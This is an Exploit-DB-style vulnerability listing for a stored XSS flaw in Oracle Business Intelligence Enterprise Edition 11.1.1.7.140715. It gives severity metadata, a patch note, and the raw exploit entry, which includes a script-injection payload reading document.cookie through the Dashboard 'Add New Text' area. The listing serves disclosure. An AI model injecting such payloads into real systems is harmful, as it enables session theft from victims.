Vendor: Business Intelligence Enterprise Edition
By: omurugur
CVSS: 8.8 (HIGH)
Type: Stored XSS
CWE: 79
Product Name: Business Intelligence Enterprise Edition
Affected Version From: 11.1.1.7.140715
Affected Version To: 11.1.1.7.140715
Patch Exists: Yes
Related CWE: N/A
CPE: a:oracle:business_intelligence_enterprise_edition
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2021

Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 – Stored XSS

A stored XSS vulnerability exists in Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715. An attacker can inject malicious JavaScript code into the Dashboard - Add New Text area, which will be executed when the page is loaded by a victim.

Mitigation:

Oracle has released a patch to address this vulnerability. Users should update to the latest version of Oracle Business Intelligence Enterprise Edition.

Exploit-DB raw data:

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored  XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text